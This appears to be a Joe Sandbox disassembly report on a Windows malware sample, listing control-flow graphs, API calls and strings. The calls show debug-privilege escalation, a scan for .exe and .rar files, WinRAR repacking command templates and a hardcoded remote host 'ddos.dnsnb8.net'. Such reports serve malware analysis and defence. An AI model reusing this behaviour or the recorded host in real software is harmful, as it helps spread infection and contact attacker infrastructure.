                              • Opcode ID: 960768b7494b0714de78479dd3345da261325d66076c8ce7f1573887e4d367d0
                              • Instruction ID: 758d3dcf7a243b97aa02d0f29bafbda8b24c715a8b2285ee40df8ede648b189a
                              • Opcode Fuzzy Hash: 960768b7494b0714de78479dd3345da261325d66076c8ce7f1573887e4d367d0
                              • Instruction Fuzzy Hash: 5751187190122DEFCF109FA8DC88ABEBBB9FB04354F10456AE615E6190D7709E50CBA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 8f28b8-8f28ff memset wsprintfA 151 8f29db-8f29df 150->151 152 8f2905-8f290d 150->152 152->151 153 8f2913-8f2919 152->153 154 8f291b-8f294c memset wsprintfA call 8f29e2 153->154 155 8f2956-8f2965 strrchr 153->155 158 8f2951 154->158 155->151 157 8f2967-8f2978 lstrcmpiA 155->157 159 8f297a-8f2981 call 8f1e6e 157->159 160 8f2988-8f2992 lstrcmpiA 157->160 158->151 163 8f2986 159->163 160->151 162 8f2994-8f299b 160->162 164 8f29ad-8f29c9 strstr 162->164 165 8f299d-8f29a3 162->165 163->151 166 8f29cb-8f29d1 call 8f239d 164->166 167 8f29d3-8f29d6 call 8f2692 164->167 165->164 168 8f29a5-8f29a7 lstrcpy 165->168 166->151 167->151 168->164
                              APIs
                              • memset.MSVCRT ref: 008F28D3
                              • wsprintfA.USER32 ref: 008F28F7
                              • memset.MSVCRT ref: 008F2925
                              • wsprintfA.USER32 ref: 008F2940
                                • Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2A02
                                • Part of subcall function 008F29E2: wsprintfA.USER32 ref: 008F2A1A
                                • Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2A44
                                • Part of subcall function 008F29E2: lstrlen.KERNEL32(?), ref: 008F2A54
                                • Part of subcall function 008F29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 008F2A6C
                                • Part of subcall function 008F29E2: strrchr.MSVCRT ref: 008F2A7C
                                • Part of subcall function 008F29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 008F2A9F
                                • Part of subcall function 008F29E2: lstrlen.KERNEL32(Documents and Settings), ref: 008F2AAE
                                • Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2AC6
                                • Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2ADA
                                • Part of subcall function 008F29E2: FindFirstFileA.KERNEL32(?,?), ref: 008F2AEF
                                • Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2B13
                              • strrchr.MSVCRT ref: 008F2959
                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 008F2974
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                              • API String ID: 3004273771-1791786966
                              • Opcode ID: a4efbe6f1fc79d37d02dc9ee8cf1a8be4f8d4e1e394cad93c7c65972c2f28882
                              • Instruction ID: e04e9b4ca389bd83a20d916d9e4ecb9e978016ba33847280e642c83efa59f926
                              • Opcode Fuzzy Hash: a4efbe6f1fc79d37d02dc9ee8cf1a8be4f8d4e1e394cad93c7c65972c2f28882
                              • Instruction Fuzzy Hash: F9318172A4031D6BDB2097B4DC99FFA7B6CFB10314F040452F695E3181EAF49AC48BA1

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 008F164F
                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 008F165B
                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,00000104), ref: 008F166E
                              • CreateThread.KERNEL32(00000000,00000000,008F1099,00000000,00000000,00000000), ref: 008F16AC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 008F16BD
                                • Part of subcall function 008F139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F13BC
                                • Part of subcall function 008F139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008F13DA
                                • Part of subcall function 008F139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 008F1448
                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F16E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$C:\Windows\system32$Documents and Settings
                              • API String ID: 123563730-1811102148
                              • Opcode ID: e9989ab8806afbab8af314e515014c1066de9002438eedf01c4affb7cf955536
                              • Instruction ID: 2cdb13d9b6fc79f5bcbd215a736e7e0c1221f6243f115b434e15c0be895f93bf
                              • Opcode Fuzzy Hash: e9989ab8806afbab8af314e515014c1066de9002438eedf01c4affb7cf955536
                              • Instruction Fuzzy Hash: B9115E71541228FBDF206BB5AD4DEBB7E6DFB95761F200012F309D11A0DA758940CBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 8f1000-8f1023 CreateFileA 206 8f1025-8f1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 8f1092-8f1096 205->207 208 8f107b-8f1085 206->208 209 8f1057-8f105f 206->209 210 8f108d-8f1091 CloseHandle 208->210 211 8f1087-8f108b CloseHandle 208->211 212 8f1074-8f1075 UnmapViewOfFile 209->212 213 8f1061-8f106e call 8f17d0 209->213 210->207 211->210 212->208 213->212
                              APIs
                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1018
                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1029
                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 008F1038
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F104B
                              • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1075
                              • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F108B
                              • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F108E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1223616889-3273462101
                              • Opcode ID: 2c0fed3a595871f2fc3d28147f25c817d97d4af1dc037bf9e8ad37b22646f01c
                              • Instruction ID: ce397c9f64ae196af9c52be7fd07e361e1bbf7e18fb92530a21c43d583bb38ba
                              • Opcode Fuzzy Hash: 2c0fed3a595871f2fc3d28147f25c817d97d4af1dc037bf9e8ad37b22646f01c
                              • Instruction Fuzzy Hash: 2C011E7150065DBFE6206F709C88E3BBAACFB847A9F00452AB645E2590DA715E448B61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 8f2c48-8f2c75 memset call 8f1973 377 8f2c77-8f2c7f 374->377 378 8f2cb2-8f2cb9 374->378 379 8f2c8f-8f2cac CreateThread WaitForMultipleObjects 377->379 380 8f2c81-8f2c8b 377->380 381 8f2cbb-8f2cc2 VirtualFree 378->381 382 8f2cc8-8f2ccc 378->382 379->378 380->379 381->382
                              APIs
                              • memset.MSVCRT ref: 008F2C57
                                • Part of subcall function 008F1973: PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
                                • Part of subcall function 008F1973: CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
                                • Part of subcall function 008F1973: Sleep.KERNEL32(00000064), ref: 008F19C6
                                • Part of subcall function 008F1973: wsprintfA.USER32 ref: 008F19EC
                                • Part of subcall function 008F1973: CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
                                • Part of subcall function 008F1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
                                • Part of subcall function 008F1973: GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
                                • Part of subcall function 008F1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
                                • Part of subcall function 008F1973: ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65
                              • CreateThread.KERNEL32(00000000,00000000,008F2B8C,00000000,00000000,00000000), ref: 008F2C99
                              • WaitForMultipleObjects.KERNEL32(00000001,008F16BA,00000001,000000FF,?,008F16BA,00000000), ref: 008F2CAC
                              • VirtualFree.KERNEL32(009E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,008F4E5C,008F4E60,?,008F16BA,00000000), ref: 008F2CC2
                              Strings
                              • C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F2C69
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                              • API String ID: 2042498389-1600416215
                              • Opcode ID: a0b2cfdf385dcc2b64e8efe7f439193283cb3c6762653bf35d97222fcc8fe2d8
                              • Instruction ID: c88120924ba9bbf61d42fba58d83d96a869cd52b8dcddbae196fbf51ef8bb376
                              • Opcode Fuzzy Hash: a0b2cfdf385dcc2b64e8efe7f439193283cb3c6762653bf35d97222fcc8fe2d8
                              • Instruction Fuzzy Hash: 1F018FB27412287AD710ABB5DC0EEBF7E6CFF41B60F504116BB15D62C1EAA49A00C7E1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 383 8f14e1-8f14fb 384 8f14fd-8f1510 GetModuleHandleA 383->384 385 8f1541-8f1547 383->385 386 8f151a-8f1535 VirtualQuery 384->386 387 8f1512-8f1518 384->387 388 8f1549-8f154c 385->388 389 8f1573-8f1574 call 8f1638 385->389 391 8f153b 386->391 392 8f1537-8f1539 386->392 387->385 393 8f154e-8f1555 388->393 394 8f1569-8f1570 388->394 395 8f1579-8f157a ExitProcess 389->395 391->385 392->385 392->391 393->394 396 8f1557-8f1566 call 8f1af9 393->396 396->394
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000), ref: 008F1504
                              • VirtualQuery.KERNEL32(008F14E1,?,0000001C), ref: 008F1525
                              • ExitProcess.KERNEL32 ref: 008F157A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: ExitHandleModuleProcessQueryVirtual
                              • String ID:
                              • API String ID: 3946701194-0
                              • Opcode ID: 3548df25b809cced42467fb0c83444ccec02b4c02bf88142d91e35923f016a54
                              • Instruction ID: ba9a7f8dd8d6ae697f25e03b7405ad35610a8ef813a7d42eba762aba30e65c08
                              • Opcode Fuzzy Hash: 3548df25b809cced42467fb0c83444ccec02b4c02bf88142d91e35923f016a54
                              • Instruction Fuzzy Hash: 8B118E71900218EFCF20EFB5A898E7EB7BCFBD8750B20502BF602D2250E6348941DB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 399 8f1915-8f1922 400 8f1928-8f192c 399->400 401 8f1924-8f1926 399->401 403 8f194f-8f1952 400->403 404 8f192e-8f194d memset GetFileTime 400->404 402 8f196e-8f1970 401->402 403->402 406 8f1954-8f1960 SetFileTime 403->406 405 8f1966-8f1968 404->405 407 8f196c 405->407 408 8f196a 405->408 406->405 407->402 408->407
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: FileTimememset
                              • String ID:
                              • API String ID: 176422537-0
                              • Opcode ID: f960042eb03934b0d3c1f4a2636e527c87ff9447b5559a3aca42e4420417d4d6
                              • Instruction ID: 6dd7adbd19f9ca01a4549b4db0eca2cd62ef8ed5b5ac7e6ae959b0dffd2ee595
                              • Opcode Fuzzy Hash: f960042eb03934b0d3c1f4a2636e527c87ff9447b5559a3aca42e4420417d4d6
                              • Instruction Fuzzy Hash: B5F0313220060DEBDB209E36DC08AB77BACFB50365F408526F626D1050E770D645DAA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 409 8f615d-8f6189 VirtualFree 411 8f618c-8f6192 409->411 412 8f6198-8f61b0 VirtualFree 411->412 413 8f60c7-8f60cf 411->413 414 8f61ba-8f61c8 412->414 415 8f61b2-8f61b4 412->415 413->411 416 8f60d5-8f60f8 VirtualAlloc 413->416 417 8f61ca-8f61d7 414->417 418 8f6243-8f6251 414->418 415->414 433 8f60fe-8f6106 416->433 434 8f60fa-8f60fc call 8f66c8 416->434 422 8f61dd-8f61e0 417->422 420 8f6264-8f626f 418->420 421 8f6253 418->421 425 8f6271-8f6276 420->425 424 8f6255-8f6258 421->424 422->418 426 8f61e2-8f61f2 422->426 424->420 429 8f625a-8f6262 424->429 430 8f627c-8f6289 425->430 431 8f6389-8f63b1 VirtualProtect 425->431 432 8f61f5-8f61fe 426->432 429->424 450 8f628b 430->450 451 8f6292-8f6298 430->451 437 8f63b7-8f63ba 431->437 435 8f620c-8f6219 432->435 436 8f6200-8f6203 432->436 439 8f6108-8f611d 433->439 440 8f6155-8f6189 VirtualFree 433->440 434->433 444 8f6238-8f623f 435->444 442 8f621b-8f6228 436->442 443 8f6205-8f6208 436->443 445 8f63fc-8f63ff VirtualProtect 437->445 446 8f63bc-8f63c2 437->446 448 8f611f-8f6121 439->448 440->411 442->444 452 8f622a-8f6236 443->452 453 8f620a 443->453 444->432 454 8f6241 444->454 449 8f6400-8f6416 445->449 446->446 455 8f63c4 446->455 456 8f6123 448->456 457 8f6151-8f6154 448->457 458 8f6418-8f641d 449->458 459 8f6420-8f6425 449->459 450->451 460 8f62a2-8f62ac 451->460 452->444 453->444 454->422 455->445 461 8f63c6-8f63cf 455->461 456->457 462 8f6125-8f6128 456->462 457->440 463 8f62ae 460->463 464 8f62b1-8f62c8 460->464 465 8f63d4-8f63d8 461->465 466 8f63d1 461->466 469 8f612a-8f612e 462->469 470 8f6134-8f613b 462->470 463->464 471 8f62ce-8f62d4 464->471 472 8f6373-8f6384 464->472 467 8f63dd-8f63e1 465->467 468 8f63da 465->468 466->465 473 8f63e7-8f63fa VirtualProtect 467->473 474 8f63e3 467->474 468->467 469->470 479 8f6130-8f6132 469->479 470->479 480 8f613d-8f614f 470->480 477 8f62da-8f62f1 471->477 478 8f62d6-8f62d9 471->478 472->425 473->437 473->445 474->473 482 8f6365-8f636e 477->482 483 8f62f3-8f62f9 477->483 478->477 479->448 480->448 482->460 484 8f62fb-8f630f 483->484 485 8f6314-8f6326 483->485 486 8f6426-8f64a9 484->486 487 8f634c-8f6360 485->487 488 8f6328-8f634a 485->488 496 8f64ab-8f64c0 486->496 497 8f6519-8f651c 486->497 487->486 488->482 503 8f6535-8f6537 496->503 504 8f64c2 496->504 498 8f651d-8f651e 497->498 499 8f6583-8f6587 497->499 502 8f6522-8f6533 498->502 501 8f6588-8f658b 499->501 505 8f658d-8f658f 501->505 506 8f65a1-8f65a3 501->506 502->503 507 8f659a 503->507 508 8f6539 503->508 509 8f64f8 504->509 510 8f64c5-8f64cd 504->510 511 8f6591-8f6593 505->511 514 8f659b-8f659d 507->514 512 8f653b-8f6541 508->512 513 8f65b4 508->513 517 8f656c-8f656f 509->517 518 8f64fa-8f64fe 509->518 515 8f64cf-8f64d4 510->515 516 8f6542-8f6545 510->516 511->514 521 8f6595 511->521 512->516 526 8f65be-8f6608 513->526 514->511 522 8f659f 514->522 523 8f6517-8f6518 515->523 524 8f64d6-8f64d9 515->524 525 8f654d-8f6550 516->525 519 8f6572 517->519 518->519 520 8f6500 518->520 527 8f6573-8f6576 519->527 520->502 528 8f6502 520->528 521->507 522->501 523->497 524->525 530 8f64db-8f64f5 524->530 525->526 531 8f6552-8f6556 525->531 532 8f6578-8f657f 527->532 528->527 533 8f6504-8f6513 528->533 530->509 531->532 534 8f6558-8f6569 531->534 532->499 533->503 536 8f6515 533->536 534->517 536->523
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008F60DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 008F6189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008F61A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Virtual$Free$Alloc
                              • String ID:
                              • API String ID: 1852963964-0
                              • Opcode ID: f3b853330f06e08c96c0aa2a96476b0ca9794455877db9d96d9fd1a3723baffa
                              • Instruction ID: f3468d1b471c5564f4034251f23d94832a47f3ceb781514ac62b1b51bfb3f4a0
                              • Opcode Fuzzy Hash: f3b853330f06e08c96c0aa2a96476b0ca9794455877db9d96d9fd1a3723baffa
                              • Instruction Fuzzy Hash: FD11513160065DCFCF318E68CC817ED37A1FF45305F684618DF49AB291EA7169A1CB94
                              APIs
                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,?,?,008F13EF), ref: 008F11AB
                              • OpenProcessToken.ADVAPI32(00000000,00000028,008F13EF,?,?,?,?,?,?,008F13EF), ref: 008F11BB
                              • AdjustTokenPrivileges.ADVAPI32(008F13EF,00000000,?,00000010,00000000,00000000), ref: 008F11EB
                              • CloseHandle.KERNEL32(008F13EF), ref: 008F11FA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,008F13EF), ref: 008F1203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F11A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
                              • API String ID: 75692138-1600416215
                              • Opcode ID: 0892817d38b40e1b0ad9a8c4567190a76d172e75f1246c8c37e2aa95ecc3e8a6
                              • Instruction ID: 328b974c18543f95d0714503b78516069191b0979cb7b9c43cb9f71188a19efc
                              • Opcode Fuzzy Hash: 0892817d38b40e1b0ad9a8c4567190a76d172e75f1246c8c37e2aa95ecc3e8a6
                              • Instruction Fuzzy Hash: 830192B5900609EFDB00DFE4D989AAEBBB9FB04305F10456AE606A2251DB719E44DB50
                              APIs
                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F13BC
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008F13DA
                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 008F1448
                                • Part of subcall function 008F119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,?,?,008F13EF), ref: 008F11AB
                                • Part of subcall function 008F119F: OpenProcessToken.ADVAPI32(00000000,00000028,008F13EF,?,?,?,?,?,?,008F13EF), ref: 008F11BB
                                • Part of subcall function 008F119F: AdjustTokenPrivileges.ADVAPI32(008F13EF,00000000,?,00000010,00000000,00000000), ref: 008F11EB
                                • Part of subcall function 008F119F: CloseHandle.KERNEL32(008F13EF), ref: 008F11FA
                                • Part of subcall function 008F119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,008F13EF), ref: 008F1203
                              Strings
                              • SeDebugPrivilege, xrefs: 008F13D3
                              • C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F13A8
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                              • String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$SeDebugPrivilege
                              • API String ID: 4123949106-1505032940
                              • Opcode ID: 72deacd5358a01946d7a94b942b4c970e7710a4d1d711d9ce011fab83b14dfde
                              • Instruction ID: 14695d99df7f31fa6b8bc8448b09c069b4b5dba2575fb90fb5a7d6b09c180a12
                              • Opcode Fuzzy Hash: 72deacd5358a01946d7a94b942b4c970e7710a4d1d711d9ce011fab83b14dfde
                              • Instruction Fuzzy Hash: B7312C71D0020DEAEF209BB58C49FFEBBB9FB94704F2041AAE604F2141D7749A45CB61
                              APIs
                              • strstr.MSVCRT ref: 008F23CC
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008F2464
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 008F2472
                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 008F24A8
                              • memset.MSVCRT ref: 008F24B9
                              • strrchr.MSVCRT ref: 008F24C9
                              • wsprintfA.USER32 ref: 008F24DE
                              • strrchr.MSVCRT ref: 008F24ED
                              • memset.MSVCRT ref: 008F24F2
                              • memset.MSVCRT ref: 008F2505
                              • wsprintfA.USER32 ref: 008F2524
                              • Sleep.KERNEL32(000007D0), ref: 008F2535
                              • Sleep.KERNEL32(000007D0), ref: 008F255D
                              • memset.MSVCRT ref: 008F256E
                              • wsprintfA.USER32 ref: 008F2585
                              • memset.MSVCRT ref: 008F25A6
                              • wsprintfA.USER32 ref: 008F25CA
                              • Sleep.KERNEL32(000007D0), ref: 008F25D0
                              • Sleep.KERNEL32(000007D0,?,?), ref: 008F25E5
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008F25FC
                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 008F2611
                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 008F2642
                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 008F265B
                              • SetEndOfFile.KERNEL32 ref: 008F266D
                              • CloseHandle.KERNEL32(00000000), ref: 008F2676
                              • RemoveDirectoryA.KERNEL32(?), ref: 008F2681
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true
                              • Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd
                              Similarity
                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2203340711-774930870
                              • Opcode ID: 39facb59703a0efa951d860c0dbc170acb7d15f87b6223e8630363d37008a188
                              • Instruction ID: 42398f2883f2f809ab47caa469b6dfc03777747e4721c63f23ed405f92dcae53
                              • Opcode Fuzzy Hash: 39facb59703a0efa951d860c0dbc170acb7d15f87b6223e8630363d37008a188
                              • Instruction Fuzzy Hash: 69817DB1504348ABD7109F74DC49EBBBBACFB88714F00051AF755D21A0DB749A49CB66
                              APIs
                              • memset.MSVCRT ref: 008F2766
